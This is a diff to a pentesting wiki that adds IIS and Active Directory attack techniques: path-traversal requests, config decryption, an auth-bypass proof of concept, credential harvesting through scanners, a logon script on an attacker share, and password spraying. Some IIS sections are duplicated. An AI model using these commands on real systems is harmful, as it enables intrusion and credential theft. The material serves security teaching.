diff --git a/src/network-services-pentesting/pentesting-web/iis-internet-information-services.md b/src/network-services-pentesting/pentesting-web/iis-internet-information-services.md index d64a189e055..c450d84e02d 100644 --- a/src/network-services-pentesting/pentesting-web/iis-internet-information-services.md +++ b/src/network-services-pentesting/pentesting-web/iis-internet-information-services.md @@ -2,6 +2,39 @@ {{#include ../../banners/hacktricks-training.md}} +Test executable file extensions: + +- asp +- aspx +- config +- php + +## Internal IP Address disclosure + +On any IIS server where you get a 302 you can try stripping the Host header and using HTTP/1.0 and inside the response the Location header could point you to the internal IP address: + +``` +nc -v domain.com 80 +openssl s_client -connect domain.com:443 +``` + +Response disclosing the internal IP: + +``` +GET / HTTP/1.0 + +HTTP/1.1 302 Moved Temporarily +Cache-Control: no-cache +Pragma: no-cache +Location: https://192.168.5.237/owa/ +Server: Microsoft-IIS/10.0 +X-FEServer: NHEXCHANGE2016 +``` + +# IIS - Internet Information Services + + + Test executable file extensions: - asp @@ -37,6 +70,281 @@ You can upload .config files and use them to execute code. One way to do it is a More information and techniques to exploit this vulnerability [here](https://soroush.secproject.com/blog/2014/07/upload-a-web-config-file-for-fun-profit/) +## Decrypt encrypted configuration and ASP.NET Core Data Protection key rings + +Two common patterns to protect secrets on IIS-hosted .NET apps are: +- ASP.NET Protected Configuration (RsaProtectedConfigurationProvider) for web.config sections like . +- ASP.NET Core Data Protection key ring (persisted locally) used to protect application secrets and cookies. + +If you have filesystem or interactive access on the web server, co-located keys often allow decryption. + +- ASP.NET (Full Framework) – decrypt protected config sections with aspnet_regiis: + +```cmd +# Decrypt a section by app path (site configured in IIS) +%WINDIR%\Microsoft.NET\Framework64\v4.0.30319\aspnet_regiis.exe -pd "connectionStrings" -app "/MyApplication" + +# Or specify the physical path (-pef/-pdf write/read to a config file under a dir) +%WINDIR%\Microsoft.NET\Framework64\v4.0.30319\aspnet_regiis.exe -pdf "connectionStrings" "C:\inetpub\wwwroot\MyApplication" +``` + +- ASP.NET Core – look for Data Protection key rings stored locally (XML/JSON files) under locations like: + - %PROGRAMDATA%\Microsoft\ASP.NET\DataProtection-Keys + - HKLM\SOFTWARE\Microsoft\ASP.NET\Core\DataProtection-Keys (registry) + - App-managed folder (e.g., App_Data\keys or a Keys directory next to the app) + +With the key ring available, an operator running in the app’s identity can instantiate an IDataProtector with the same purposes and unprotect stored secrets. Misconfigurations that store the key ring with the app files make offline decryption trivial once the host is compromised. + +References: +- Microsoft Learn – Protected Configuration (aspnet_regiis -pe/-pd/-pef/-pdf) +- Microsoft Learn – ASP.NET Core Data Protection configuration and key storage + +## IIS Discovery Bruteforce + +Download the list that I have created: + +{{#file}} +iisfinal.txt +{{#endfile}} + +It was created merging the contents of the following lists: + +[https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/IIS.fuzz.txt](https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/IIS.fuzz.txt)\ +[http://itdrafts.blogspot.com/2013/02/aspnetclient-folder-enumeration-and.html](http://itdrafts.blogspot.com/2013/02/aspnetclient-folder-enumeration-and.html)\ +[https://github.com/digination/dirbuster-ng/blob/master/wordlists/vulns/iis.txt](https://github.com/digination/dirbuster-ng/blob/master/wordlists/vulns/iis.txt)\ +[https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/SVNDigger/cat/Language/aspx.txt](https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/SVNDigger/cat/Language/aspx.txt)\ +[https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/SVNDigger/cat/Language/asp.txt](https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/SVNDigger/cat/Language/asp.txt)\ +[https://raw.githubusercontent.com/xmendez/wfuzz/master/wordlist/vulns/iis.txt](https://raw.githubusercontent.com/xmendez/wfuzz/master/wordlist/vulns/iis.txt) + +Use it without adding any extension, the files that need it have it already. + +## Path Traversal + +### Leaking source code + +Check the full writeup in: [https://blog.mindedsecurity.com/2018/10/from-path-traversal-to-source-code-in.html](https://blog.mindedsecurity.com/2018/10/from-path-traversal-to-source-code-in.html) + +> [!TIP] +> As summary, there are several web.config files inside the folders of the application with references to "**assemblyIdentity**" files and "**namespaces**". With this information it's possible to know **where are executables located** and download them.\ +> From the **downloaded Dlls** it's also possible to find **new namespaces** where you should try to access and get the web.config file in order to find new namespaces and assemblyIdentity.\ +> Also, the files **connectionstrings.config** and **global.asax** may contain interesting information. + +In **.Net MVC applications**, the **web.config** file plays a crucial role by specifying each binary file the application relies on through **"assemblyIdentity"** XML tags. + +### **Exploring Binary Files** + +An example of accessing the **web.config** file is shown below: + +```html +GET /download_page?id=..%2f..%2fweb.config HTTP/1.1 +Host: example-mvc-application.minded +``` + +This request reveals various settings and dependencies, such as: + +- **EntityFramework** version +- **AppSettings** for webpages, client validation, and JavaScript +- **System.web** configurations for authentication and runtime +- **System.webServer** modules settings +- **Runtime** assembly bindings for numerous libraries like **Microsoft.Owin**, **Newtonsoft.Json**, and **System.Web.Mvc** + +These settings indicate that certain files, such as **/bin/WebGrease.dll**, are located within the application's /bin folder. + +### **Root Directory Files** + +Files found in the root directory, like **/global.asax** and **/connectionstrings.config** (which contains sensitive passwords), are essential for the application's configuration and operation. + +### **Namespaces and Web.Config** + +MVC applications also define additional **web.config files** for specific namespaces to avoid repetitive declarations in each file, as demonstrated with a request to download another **web.config**: + +```html +GET /download_page?id=..%2f..%2fViews/web.config HTTP/1.1 +Host: example-mvc-application.minded +``` + +### **Downloading DLLs** + +The mention of a custom namespace hints at a DLL named "**WebApplication1**" present in the /bin directory. Following this, a request to download the **WebApplication1.dll** is shown: + +```html +GET /download_page?id=..%2f..%2fbin/WebApplication1.dll HTTP/1.1 +Host: example-mvc-application.minded +``` + +This suggests the presence of other essential DLLs, like **System.Web.Mvc.dll** and **System.Web.Optimization.dll**, in the /bin directory. + +In a scenario where a DLL imports a namespace called **WebApplication1.Areas.Minded**, an attacker might infer the existence of other web.config files in predictable paths, such as **/area-name/Views/**, containing specific configurations and references to other DLLs in the /bin folder. For example, a request to **/Minded/Views/web.config** can reveal configurations and namespaces that indicate the presence of another DLL, **WebApplication1.AdditionalFeatures.dll**. + +### Common files + +From [here](https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/) + +``` +C:\Apache\conf\httpd.conf +C:\Apache\logs\access.log +C:\Apache\logs\error.log +C:\Apache2\conf\httpd.conf +C:\Apache2\logs\access.log +C:\Apache2\logs\error.log +C:\Apache22\conf\httpd.conf +C:\Apache22\logs\access.log +C:\Apache22\logs\error.log +C:\Apache24\conf\httpd.conf +C:\Apache24\logs\access.log +C:\Apache24\logs\error.log +C:\Documents and Settings\Administrator\NTUser.dat +C:\php\php.ini +C:\php4\php.ini +C:\php5\php.ini +C:\php7\php.ini +C:\Program Files (x86)\Apache Group\Apache\conf\httpd.conf +C:\Program Files (x86)\Apache Group\Apache\logs\access.log +C:\Program Files (x86)\Apache Group\Apache\logs\error.log +C:\Program Files (x86)\Apache Group\Apache2\conf\httpd.conf +C:\Program Files (x86)\Apache Group\Apache2\logs\access.log +C:\Program Files (x86)\Apache Group\Apache2\logs\error.log +c:\Program Files (x86)\php\php.ini" +C:\Program Files\Apache Group\Apache\conf\httpd.conf +C:\Program Files\Apache Group\Apache\conf\logs\access.log +C:\Program Files\Apache Group\Apache\conf\logs\error.log +C:\Program Files\Apache Group\Apache2\conf\httpd.conf +C:\Program Files\Apache Group\Apache2\conf\logs\access.log +C:\Program Files\Apache Group\Apache2\conf\logs\error.log +C:\Program Files\FileZilla Server\FileZilla Server.xml +C:\Program Files\MySQL\my.cnf +C:\Program Files\MySQL\my.ini +C:\Program Files\MySQL\MySQL Server 5.0\my.cnf +C:\Program Files\MySQL\MySQL Server 5.0\my.ini +C:\Program Files\MySQL\MySQL Server 5.1\my.cnf +C:\Program Files\MySQL\MySQL Server 5.1\my.ini +C:\Program Files\MySQL\MySQL Server 5.5\my.cnf +C:\Program Files\MySQL\MySQL Server 5.5\my.ini +C:\Program Files\MySQL\MySQL Server 5.6\my.cnf +C:\Program Files\MySQL\MySQL Server 5.6\my.ini +C:\Program Files\MySQL\MySQL Server 5.7\my.cnf +C:\Program Files\MySQL\MySQL Server 5.7\my.ini +C:\Program Files\php\php.ini +C:\Users\Administrator\NTUser.dat +C:\Windows\debug\NetSetup.LOG +C:\Windows\Panther\Unattend\Unattended.xml +C:\Windows\Panther\Unattended.xml +C:\Windows\php.ini +C:\Windows\repair\SAM +C:\Windows\repair\system +C:\Windows\System32\config\AppEvent.evt +C:\Windows\System32\config\RegBack\SAM +C:\Windows\System32\config\RegBack\system +C:\Windows\System32\config\SAM +C:\Windows\System32\config\SecEvent.evt +C:\Windows\System32\config\SysEvent.evt +C:\Windows\System32\config\SYSTEM +C:\Windows\System32\drivers\etc\hosts +C:\Windows\System32\winevt\Logs\Application.evtx +C:\Windows\System32\winevt\Logs\Security.evtx +C:\Windows\System32\winevt\Logs\System.evtx +C:\Windows\win.ini +C:\xampp\apache\conf\extra\httpd-xampp.conf +C:\xampp\apache\conf\httpd.conf +C:\xampp\apache\logs\access.log +C:\xampp\apache\logs\error.log +C:\xampp\FileZillaFTP\FileZilla Server.xml +C:\xampp\MercuryMail\MERCURY.INI +C:\xampp\mysql\bin\my.ini +C:\xampp\php\php.ini +C:\xampp\security\webdav.htpasswd +C:\xampp\sendmail\sendmail.ini +C:\xampp\tomcat\conf\server.xml +``` + +## HTTPAPI 2.0 404 Error + +If you see an error like the following one: + +![](<../../images/image (446) (1) (2) (2) (3) (3) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (10) (2).png>) + +It means that the server **didn't receive the correct domain name** inside the Host header.\ +In order to access the web page you could take a look to the served **SSL Certificate** and maybe you can find the domain/subdomain name in there. If it isn't there you may need to **brute force VHosts** until you find the correct one. + +## Old IIS vulnerabilities worth looking for + +### Microsoft IIS tilde character “\~” Vulnerability/Feature – Short File/Folder Name Disclosure + +You can try to **enumerate folders and files** inside every discovered folder (even if it's requiring Basic Authentication) using this **technique**.\ +The main limitation of this technique if the server is vulnerable is that **it can only find up to the first 6 letters of the name of each file/folder and the first 3 letters of the extension** of the files. + +You can use [https://github.com/irsdl/IIS-ShortName-Scanner](https://github.com/irsdl/IIS-ShortName-Scanner) to test for this vulnerability:`java -jar iis_shortname_scanner.jar 2 20 http://10.13.38.11/dev/dca66d38fd916317687e1390a420c3fc/db/` + +![](<../../images/image (844).png>) + +Original research: [https://soroush.secproject.com/downloadable/microsoft_iis_tilde_character_vulnerability_feature.pdf](https://soroush.secproject.com/downloadable/microsoft_iis_tilde_character_vulnerability_feature.pdf) + +You can also use **metasploit**: `use scanner/http/iis_shortname_scanner` + +A nice idea to **find the final name** of the discovered files is to **ask LLMs** for options like it's done in the script [https://github.com/Invicti-Security/brainstorm/blob/main/fuzzer_shortname.py](https://github.com/Invicti-Security/brainstorm/blob/main/fuzzer_shortname.py) + +### Basic Authentication bypass + +**Bypass** a basic authentication (**IIS 7.5**) trying to access: `/admin:$i30:$INDEX_ALLOCATION/admin.php` or `/admin::$INDEX_ALLOCATION/admin.php` + +You can try to **mix** this **vulnerability** and the last one to find new **folders** and **bypass** the authentication. + +## ASP.NET Trace.AXD enabled debugging + +ASP.NET include a debugging mode and its file is called `trace.axd`. + +It keeps a very detailed log of all requests made to an application over a period of time. + +This information includes remote client IP's, session IDs, all request and response cookies, physical paths, source code information, and potentially even usernames and passwords. + +[https://www.rapid7.com/db/vulnerabilities/spider-asp-dot-net-trace-axd/](https://www.rapid7.com/db/vulnerabilities/spider-asp-dot-net-trace-axd/) + +![Screenshot 2021-03-30 at 13 19 11](https://user-images.githubusercontent.com/31736688/112974448-2690b000-915b-11eb-896c-f41c27c44286.png) + +## ASPXAUTH Cookie + +ASPXAUTH uses the following info: + +- **`validationKey`** (string): hex-encoded key to use for signature validation. +- **`decryptionMethod`** (string): (default “AES”). +- **`decryptionIV`** (string): hex-encoded initialization vector (defaults to a vector of zeros). +- **`decryptionKey`** (string): hex-encoded key to use for decryption. + +However, some people will use the **default values** of these parameters and will use as **cookie the email of the user**. Therefore, if you can find a web using the **same platform** that is using the ASPXAUTH cookie and you **create a user with the email of the user you want to impersonate** on the server under attack, you may be able to us**e the cookie from the second server in the first one** and impersonate the user.\ +This attacked worked in this [**writeup**](https://infosecwriteups.com/how-i-hacked-facebook-part-two-ffab96d57b19). + +## IIS Authentication Bypass with cached passwords (CVE-2022-30209) + +[Full report here](https://blog.orange.tw/2022/08/lets-dance-in-the-cache-destabilizing-hash-table-on-microsoft-iis.html): A bug in the code **didn't properly check for the password given by the user**, so an attacker whose **password hash hits a key** that is already in the **cache** will be able to login as that user . + +```python +# script for sanity check +> type test.py +def HashString(password): + j = 0 + for c in map(ord, password): + j = c + (101*j)&0xffffffff + return j + +assert HashString('test-for-CVE-2022-30209-auth-bypass') == HashString('ZeeiJT') + +# before the successful login +> curl -I -su 'orange:ZeeiJT' 'http:///protected/' | findstr HTTP +HTTP/1.1 401 Unauthorized + +# after the successful login +> curl -I -su 'orange:ZeeiJT' 'http:///protected/' | findstr HTTP +HTTP/1.1 200 OK +``` + +## References + +- [Walkthrough: Encrypting Configuration Information Using Protected Configuration](https://learn.microsoft.com/en-us/previous-versions/aspnet/dtkwfdky(v=vs.100)) +- [Configure ASP.NET Core Data Protection](https://learn.microsoft.com/en-us/aspnet/core/security/data-protection/configuration/overview) +- [HTB: Sweep — Lansweeper credential interception and AD ACL abuse to Domain Admin](https://0xdf.gitlab.io/2025/08/14/htb-sweep.html) + + + ## IIS Discovery Bruteforce Download the list that I have created: diff --git a/src/windows-hardening/active-directory-methodology/README.md b/src/windows-hardening/active-directory-methodology/README.md index 358f08bf060..96078bc28fd 100644 --- a/src/windows-hardening/active-directory-methodology/README.md +++ b/src/windows-hardening/active-directory-methodology/README.md @@ -240,6 +240,26 @@ If you can **access other PCs or shares** you could **place files** (like a SCF ../ntlm/places-to-steal-ntlm-creds.md {{#endref}} +### Abusing discovery/management scanners to harvest credentials + +Enterprise inventory and scanning platforms often authenticate to targets using stored credentials. If you can define scan targets, point one to an attacker-controlled host/service and run a honeypot to capture the attempted authentication. + +Example for SSH: +- Run an SSH honeypot (e.g., sshesame) on a reachable port. +- In the scanner, create a target pointing to your host:port and map a stored SSH credential to it. +- Trigger the scan and collect the username/password from the honeypot logs. + +This pattern generalizes to any active scanner/ITAM that performs authenticated checks against operator-defined targets. + +### Abusing remote deployment features for SYSTEM execution + +Many IT asset/patching tools support push deployments. With sufficient portal privileges, create or edit a deployment package to run arbitrary commands on an enrolled agent or remote host. These jobs frequently execute as a high-privileged service account or LocalSystem, yielding local privilege escalation and lateral movement. + +- Create a new package with a simple command (e.g., add a user, run PowerShell, drop an agent) and deploy it to a test target. +- Preferred transport depends on the product (agent channel, SMB/ADMIN$, WinRM). Adjust firewall/AV evasion accordingly. + +Hygiene: treat these features like remote admin. Least privilege and approvals limit impact. + ### CVE-2021-1675/CVE-2021-34527 PrintNightmare This vulnerability allowed any authenticated user to **compromise the domain controller**. @@ -249,7 +269,6 @@ This vulnerability allowed any authenticated user to **compromise the domain con printnightmare.md {{#endref}} -## Privilege escalation on Active Directory WITH privileged credentials/session **For the following techniques a regular domain user is not enough, you need some special privileges/credentials to perform these attacks.** @@ -807,5 +826,7 @@ https://cloud.hacktricks.wiki/en/pentesting-cloud/azure-security/az-lateral-move - [http://www.harmj0y.net/blog/redteaming/a-guide-to-attacking-domain-trusts/](http://www.harmj0y.net/blog/redteaming/a-guide-to-attacking-domain-trusts/) - [https://www.labofapenetrationtester.com/2018/10/deploy-deception.html](https://www.labofapenetrationtester.com/2018/10/deploy-deception.html) - [https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/child-domain-da-to-ea-in-parent-domain](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/child-domain-da-to-ea-in-parent-domain) +- [sshesame – SSH honeypot](https://github.com/jaksi/sshesame) +- [HTB: Sweep — Lansweeper credential interception and AD ACL abuse to Domain Admin](https://0xdf.gitlab.io/2025/08/14/htb-sweep.html) {{#include ../../banners/hacktricks-training.md}} diff --git a/src/windows-hardening/active-directory-methodology/acl-persistence-abuse/README.md b/src/windows-hardening/active-directory-methodology/acl-persistence-abuse/README.md index ac81ea7d1d4..370e4149486 100644 --- a/src/windows-hardening/active-directory-methodology/acl-persistence-abuse/README.md +++ b/src/windows-hardening/active-directory-methodology/acl-persistence-abuse/README.md @@ -42,6 +42,31 @@ Add-ADGroupMember -Identity "domain admins" -Members spotless Add-NetGroupUser -UserName spotless -GroupName "domain admins" -Domain "offense.local" ``` +### Escalate remote access via privileged local groups + +GenericAll over built-in local groups that gate remote access lets you pivot without full DA. Common targets: + +- Remote Management Users → WinRM access (5985/5986) +- Remote Desktop Users → RDP logon +- Administrators → Full local admin on the target(s) + +Examples: + +```bash +# Windows PowerShell +Add-ADGroupMember -Identity "Remote Management Users" -Members spotless -Verbose + +# Linux (BloodyAD) +python3 bloodyAD.py -d FABRIKAM.LOCAL -u bob -p 'P@ssw0rd!' \ + add groupMember 'CN=Remote Management Users,CN=Builtin,DC=fabrikam,DC=local' bob +``` + +Note: Built-in local groups live under `CN=Builtin,DC=...`. After adding yourself, try WinRM: + +```bash +evil-winrm -i -u FABRIKAM\\bob -p 'P@ssw0rd!' +``` + ## **GenericAll / GenericWrite / Write on Computer/User** Holding these privileges on a computer object or a user account allows for: @@ -106,7 +131,7 @@ Set-DomainObjectOwner -Identity Herman -OwnerIdentity nico This permission allows an attacker to modify user properties. Specifically, with `GenericWrite` access, the attacker can change the logon script path of a user to execute a malicious script upon user logon. This is achieved by using the `Set-ADObject` command to update the `scriptpath` property of the target user to point to the attacker's script. ```bash -Set-ADObject -SamAccountName delegate -PropertyName scriptpath -PropertyValue "\\10.0.0.5\totallyLegitScript.ps1" +Set-ADObject -SamAccountName delegate -PropertyName scriptpath -PropertyValue "\\10.0.0.5\\totallyLegitScript.ps1" ``` ## **GenericWrite on Group** @@ -206,8 +231,8 @@ Furthermore, additional methods for executing code or maintaining persistence, s - [https://learn.microsoft.com/en-us/dotnet/api/system.directoryservices.activedirectoryrights?view=netframework-4.7.2](https://learn.microsoft.com/en-us/dotnet/api/system.directoryservices.activedirectoryrights?view=netframework-4.7.2) - [https://blog.fox-it.com/2018/04/26/escalating-privileges-with-acls-in-active-directory/](https://blog.fox-it.com/2018/04/26/escalating-privileges-with-acls-in-active-directory/) - [https://adsecurity.org/?p=3658](https://adsecurity.org/?p=3658) -- [https://learn.microsoft.com/en-us/dotnet/api/system.directoryservices.activedirectoryaccessrule.-ctor?view=netframework-4.7.2#System_DirectoryServices_ActiveDirectoryAccessRule\_\_ctor_System_Security_Principal_IdentityReference_System_DirectoryServices_ActiveDirectoryRights_System_Security_AccessControl_AccessControlType\_](https://learn.microsoft.com/en-us/dotnet/api/system.directoryservices.activedirectoryaccessrule.-ctor?view=netframework-4.7.2#System_DirectoryServices_ActiveDirectoryAccessRule__ctor_System_Security_Principal_IdentityReference_System_DirectoryServices_ActiveDirectoryRights_System_Security_AccessControl_AccessControlType_) - -{{#include ../../../banners/hacktricks-training.md}} - +- [https://learn.microsoft.com/en-us/dotnet/api/system.directoryservices.activedirectoryaccessrule.-ctor?view=netframework-4.7.2#System_DirectoryServices_ActiveDirectoryAccessRule__ctor_System_Security_Principal_IdentityReference_System_DirectoryServices_ActiveDirectoryRights_System_Security_AccessControl_AccessControlType_](https://learn.microsoft.com/en-us/dotnet/api/system.directoryservices.activedirectoryaccessrule.-ctor?view=netframework-4.7.2#System_DirectoryServices_ActiveDirectoryAccessRule__ctor_System_Security_Principal_IdentityReference_System_DirectoryServices_ActiveDirectoryRights_System_Security_AccessControl_AccessControlType_) +- [BloodyAD](https://github.com/CravateRouge/bloodyAD) +- [HTB: Sweep — Lansweeper credential interception and AD ACL abuse to Domain Admin](https://0xdf.gitlab.io/2025/08/14/htb-sweep.html) +{{#include ../../../banners/hacktricks-training.md}} \ No newline at end of file diff --git a/src/windows-hardening/active-directory-methodology/password-spraying.md b/src/windows-hardening/active-directory-methodology/password-spraying.md index bd408ae7d97..59a128e453a 100644 --- a/src/windows-hardening/active-directory-methodology/password-spraying.md +++ b/src/windows-hardening/active-directory-methodology/password-spraying.md @@ -53,6 +53,23 @@ crackmapexec smb --local-auth 10.10.10.10/23 -u administrator -H 10298e182387f9c ./kerbrute_linux_amd64 bruteuser -d lab.ropnop.com [--dc 10.10.10.10] passwords.lst thoffman ``` +#### Kerberos time sync and fast "user:user" spray + +Kerberos is time sensitive. If your host clock differs from the KDC beyond the allowed skew, you will see failures like KRB_AP_ERR_SKEW and miss valid hits. Always sync time before Kerberos-based spraying: + +```bash +# Linux +sudo ntpdate || sudo chronyc -a makestep +# Windows +w32tm /resync /nowait +``` + +A quick low-noise check that often finds weak accounts is a username=password spray. Example with kerbrute: + +```bash +./kerbrute_linux_amd64 passwordspray -d EXAMPLE.LOCAL --dc dc01.example.local users.txt {user} +``` + - [**spray**](https://github.com/Greenwolf/Spray) _**(you can indicate number of attempts to avoid lockouts):**_ ```bash @@ -226,6 +243,8 @@ To use any of these tools, you need a user list and a password / a small list of - [https://www.ired.team/offensive-security/initial-access/password-spraying-outlook-web-access-remote-shell](https://www.ired.team/offensive-security/initial-access/password-spraying-outlook-web-access-remote-shell) - [www.blackhillsinfosec.com/?p=5296](https://www.blackhillsinfosec.com/?p=5296) - [https://hunter2.gitbook.io/darthsidious/initial-access/password-spraying](https://hunter2.gitbook.io/darthsidious/initial-access/password-spraying) +- [MIT Kerberos – clockskew](https://web.mit.edu/kerberos/krb5-latest/doc/admin/conf_files/krb5_conf.html#clockskew) +- [HTB: Sweep — Lansweeper credential interception and AD ACL abuse to Domain Admin](https://0xdf.gitlab.io/2025/08/14/htb-sweep.html) -{{#include ../../banners/hacktricks-training.md}} +{{#include ../../banners/hacktricks-training.md}} \ No newline at end of file